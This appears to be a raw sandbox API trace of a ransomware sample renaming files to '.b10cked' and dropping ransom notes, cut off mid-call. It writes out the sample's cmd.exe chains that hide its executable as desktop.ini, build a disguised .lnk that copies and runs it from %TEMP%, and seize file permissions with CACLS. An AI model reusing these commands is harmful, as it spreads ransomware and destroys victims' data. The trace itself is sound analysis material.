SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xf8 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xf8 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0216.435] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0216.435] ReadFile (in: hFile=0x1b4, lpBuffer=0x130c368, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x130c368*, lpNumberOfBytesRead=0x12ec08*=0x7b, lpOverlapped=0x0) returned 1 [0216.436] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0216.436] WriteFile (in: hFile=0x1b4, lpBuffer=0x130c368*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x130c368*, lpNumberOfBytesWritten=0x12ec1c*=0x7b, lpOverlapped=0x0) returned 1 [0216.436] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=-123, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7d [0216.436] ReadFile (in: hFile=0x1b4, lpBuffer=0x130c368, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x130c368*, lpNumberOfBytesRead=0x12ec08*=0x7b, lpOverlapped=0x0) returned 1 [0216.436] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-123, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7d [0216.437] WriteFile (in: hFile=0x1b4, lpBuffer=0x130c368*, nNumberOfBytesToWrite=0x7b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x130c368*, lpNumberOfBytesWritten=0x12ec1c*=0x7b, lpOverlapped=0x0) returned 1 [0216.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Everywhere.search-ms", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0216.440] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Everywhere.search-ms", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Everywhere.search-ms", lpUsedDefaultChar=0x0) returned 20 [0216.440] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xf8 [0216.440] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0216.441] CloseHandle (hObject=0x1b4) returned 1 [0216.441] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\Everywhere.search-ms", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\EVERYW~1.SEA") returned 0x26 
[0216.441] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\") returned 0x1a [0216.442] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\EVERYW~1.SEA\" \"C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\EVERYW~1.SEA\" \"C:\\Users\\Default\\Searches\\Everywhere.search-ms.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xc0c, dwThreadId=0xcb8)) returned 1 [0216.445] CloseHandle (hObject=0x120) returned 1 [0216.445] CloseHandle (hObject=0x1b4) returned 1 [0216.445] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Searches\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\SEARCHES\\") returned 0x1a [0216.445] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\", cchLength=0x11 | out: lpsz="C:\\USERS\\DEFAULT\\") returned 0x11 [0216.445] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\SEARCHES\\", cchCount1=26, lpString2="C:\\USERS\\DEFAULT\\", cchCount2=17) returned 3 [0216.445] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Searches\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\SEARCHES\\") returned 0x1a [0216.445] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 
[0216.445] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\SEARCHES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0216.445] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0216.445] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0216.445] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0216.445] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\") returned 0x1a [0216.446] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0216.446] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0216.446] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xbd8, dwThreadId=0xa70)) returned 1 [0216.447] CloseHandle (hObject=0x120) returned 1 [0216.447] CloseHandle (hObject=0x1b4) returned 1 [0216.447] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\searches\\bl0cked-readme.rtf")) returned 0xffffffff [0216.447] GetLastError () returned 0x2 [0216.447] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\searches\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0216.450] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\searches\\bl0cked-readme.rtf")) returned 0x20 [0216.450] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0216.450] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0216.450] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0216.450] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0216.450] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0216.450] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: 
lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0216.450] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0216.450] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches\\") returned 0x1a [0216.450] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0216.450] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0216.450] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Searches", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Searches") returned 0x19 [0216.451] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x122 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\DEFAULT\\SEARCHES\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\DEFAULT\\SEARCHES\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\DEFAULT\\SEARCHES\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\DEFAULT\\SEARCHES\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x122 [0216.451] CharUpperBuffW (in: 
lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0216.451] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x40c, dwThreadId=0xb78)) returned 1 [0216.455] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0217.129] CloseHandle (hObject=0x1b4) returned 1 [0217.129] CloseHandle (hObject=0x120) returned 1 [0217.130] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0217.130] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0217.130] FindClose (in: hFindFile=0x1fec00 
| out: hFindFile=0x1fec00) returned 1 [0217.130] GetTickCount () returned 0x3cb78 [0217.130] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=27391922687) returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x54\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x43\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x61\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x63\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x37\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x41\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0217.130] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0217.130] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0217.130] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0217.130] CharUpperBuffW (in: lpsz="explorer.exe \"Searches\" & type \"Searches\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"SEARCHES\" & TYPE \"SEARCHES\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0217.130] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0217.130] CharUpperBuffW (in: lpsz="explorer.exe \"Searches\" & type \"Searches\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"SEARCHES\" & TYPE \"SEARCHES\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0217.130] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0217.130] CoInitialize (pvReserved=0x0) returned 0x0 [0217.131] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0217.132] 
ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0217.132] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0217.132] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0217.133] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Searches\" & type \"Searches\\desktop.ini\" > \"%TEMP%\\jTCac7A6.exe\" && \"%TEMP%\\jTCac7A6.exe\"") returned 0x0 [0217.133] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0217.134] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0217.134] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0217.134] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\Default\\Searches.lnk", fRemember=0) returned 0x0 [0217.142] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0217.142] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0217.142] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0217.142] CoUninitialize () [0217.143] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.143] ReleaseMutex (hMutex=0xf8) returned 1 [0217.143] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.143] ReleaseMutex (hMutex=0xf8) returned 1 [0217.143] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0217.143] ReleaseMutex (hMutex=0xf8) returned 1 [0217.143] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) 
returned 0x0 [0217.143] ReleaseMutex (hMutex=0xf8) returned 1 [0217.143] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0217.177] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", lpFilePart=0x12eab4*="Indexed Locations.search-ms") returned 0x35 [0217.177] GetLastError () returned 0x5 [0217.177] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0217.177] LocalFree (hMem=0x1c6cc8) returned 0x0 [0217.177] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0217.177] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0217.177] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0217.177] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0217.177] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0217.178] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0217.178] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms\"", lpProcessInformation=0x12fba4*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xa0c, dwThreadId=0xcf8)) returned 1 [0217.181] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0217.472] CloseHandle (hObject=0x120) returned 1 [0217.472] CloseHandle (hObject=0x1b4) returned 1 [0217.472] WaitForSingleObject (hHandle=0xf8, 
